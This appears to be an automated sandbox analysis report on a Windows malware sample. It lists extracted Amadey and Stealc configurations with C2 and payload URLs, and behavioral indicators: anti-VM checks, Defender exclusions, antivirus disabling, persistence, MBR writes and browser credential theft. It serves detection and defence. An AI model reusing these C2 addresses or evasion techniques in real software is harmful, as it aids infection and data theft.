Analysis
-
max time kernel
79s -
max time network
117s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
26/03/2025, 05:10
Static task
static1
General
-
Target
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
-
Size
1.8MB
-
MD5
442fc32065555d167806a2a766454b88
-
SHA1
10882938da5aed6fe9e2d7df16919aca6e849eff
-
SHA256
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9
-
SHA512
c19e959174d1e266302d782ffb43ffdd891387c4121fa5949f20b6e7d932326f76a972c0bb55cdb4cf51bb49987cd69426100e745f20def59d90fa73add80fe7
-
SSDEEP
49152:TnkrXn/GImQqXv0k14QUpvyXW+rKKM2F0luHM4iON6I3sd1:TnkTn/Gqq/B17uvV+PMQMuse
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/8156-19418-0x00000000003D0000-0x000000000084E000-memory.dmp healer behavioral2/memory/8156-19419-0x00000000003D0000-0x000000000084E000-memory.dmp healer behavioral2/memory/8156-20622-0x00000000003D0000-0x000000000084E000-memory.dmp healer -
Healer family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 64145b6cb6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1ced906bca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1072de6716.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 104 5784 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2472 powershell.exe 7344 powershell.exe 7672 powershell.exe 7900 powershell.exe 5784 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 10 IoCs
flow pid Process 35 5384 svchost.exe 42 1904 rapes.exe 42 1904 rapes.exe 42 1904 rapes.exe 42 1904 rapes.exe 42 1904 rapes.exe 28 1904 rapes.exe 30 1904 rapes.exe 40 1904 rapes.exe 104 5784 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\4e6f50f4.sys 923a15a9.exe File created C:\Windows\System32\Drivers\klupd_4e6f50f4a_arkmon.sys 923a15a9.exe File created C:\Windows\System32\Drivers\klupd_4e6f50f4a_klbg.sys 923a15a9.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 4112 takeown.exe 392 icacls.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klark.sys" 923a15a9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_mark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_mark.sys" 923a15a9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_4e6f50f4a_arkmon.sys" 923a15a9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4e6f50f4\ImagePath = "System32\\Drivers\\4e6f50f4.sys" 923a15a9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_arkmon.sys" 923a15a9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klbg\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klbg.sys" 923a15a9.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1ced906bca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1072de6716.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1072de6716.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 64145b6cb6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 64145b6cb6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1ced906bca.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 11.exe -
Deletes itself 1 IoCs
pid Process 3584 w32tm.exe -
Executes dropped EXE 17 IoCs
pid Process 1904 rapes.exe 2960 apple.exe 3964 11.exe 1624 11.exe 2928 f73ae_003.exe 1160 7IIl2eE.exe 2244 tzutil.exe 3584 w32tm.exe 13208 rapes.exe 4512 73998ddf32.exe 8524 483d2fa8a0d53818306efeb32d3.exe 3692 64145b6cb6.exe 9516 1ced906bca.exe 9384 44ae5ee5.exe 10556 923a15a9.exe 6276 6a162b453f.exe 8156 1072de6716.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 1ced906bca.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 1072de6716.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 64145b6cb6.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys 923a15a9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys\ = "Driver" 923a15a9.exe -
Loads dropped DLL 26 IoCs
pid Process 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4112 takeown.exe 392 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338050121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\64145b6cb6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338170101\\64145b6cb6.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\61a99688-3ceb-422b-89c3-50229b6b9c76 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{ff499140-fbb0-4a6a-8812-a68293f59bd9}\\61a99688-3ceb-422b-89c3-50229b6b9c76.cmd\"" 923a15a9.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1ced906bca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338180101\\1ced906bca.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a162b453f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338190101\\6a162b453f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1072de6716.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338200101\\1072de6716.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 923a15a9.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 923a15a9.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00020000000232f2-19123.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 9616 tasklist.exe 13256 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 5608 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 1904 rapes.exe 13208 rapes.exe 8524 483d2fa8a0d53818306efeb32d3.exe 3692 64145b6cb6.exe 9516 1ced906bca.exe 8156 1072de6716.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4512 set thread context of 2600 4512 73998ddf32.exe 200 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 44ae5ee5.exe File opened (read-only) \??\VBoxMiniRdrDN 923a15a9.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5524 sc.exe 5100 sc.exe 3548 sc.exe 5828 sc.exe 376 sc.exe 904 sc.exe 1064 sc.exe 1492 sc.exe 2128 sc.exe 4280 sc.exe 624 sc.exe 2248 sc.exe 1468 sc.exe 5268 sc.exe 2192 sc.exe 928 sc.exe 4380 sc.exe 4040 sc.exe 4580 sc.exe 856 sc.exe 3536 sc.exe 5712 sc.exe 3272 sc.exe 428 sc.exe 4200 sc.exe 5920 sc.exe 5388 sc.exe 2464 sc.exe 5344 sc.exe 2536 sc.exe 4620 sc.exe 3056 sc.exe 1996 sc.exe 3916 sc.exe 756 sc.exe 5420 sc.exe 5416 sc.exe 2996 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ced906bca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1072de6716.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6a162b453f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 6a162b453f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 64145b6cb6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44ae5ee5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 923a15a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 6a162b453f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1132 timeout.exe 5068 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 11556 taskkill.exe 12980 taskkill.exe 7136 taskkill.exe 1832 taskkill.exe 7368 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8140 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 5608 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 5608 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 1904 rapes.exe 1904 rapes.exe 2472 powershell.exe 2472 powershell.exe 2472 powershell.exe 13208 rapes.exe 13208 rapes.exe 7344 powershell.exe 7344 powershell.exe 7344 powershell.exe 7672 powershell.exe 7672 powershell.exe 7672 powershell.exe 7900 powershell.exe 7900 powershell.exe 7900 powershell.exe 5784 powershell.exe 5784 powershell.exe 5784 powershell.exe 2600 MSBuild.exe 2600 MSBuild.exe 2600 MSBuild.exe 2600 MSBuild.exe 8524 483d2fa8a0d53818306efeb32d3.exe 8524 483d2fa8a0d53818306efeb32d3.exe 3692 64145b6cb6.exe 3692 64145b6cb6.exe 3692 64145b6cb6.exe 3692 64145b6cb6.exe 3692 64145b6cb6.exe 3692 64145b6cb6.exe 9516 1ced906bca.exe 9516 1ced906bca.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 8156 1072de6716.exe 8156 1072de6716.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 8156 1072de6716.exe 8156 1072de6716.exe 8156 1072de6716.exe -
Suspicious behavior: LoadsDriver 6 IoCs
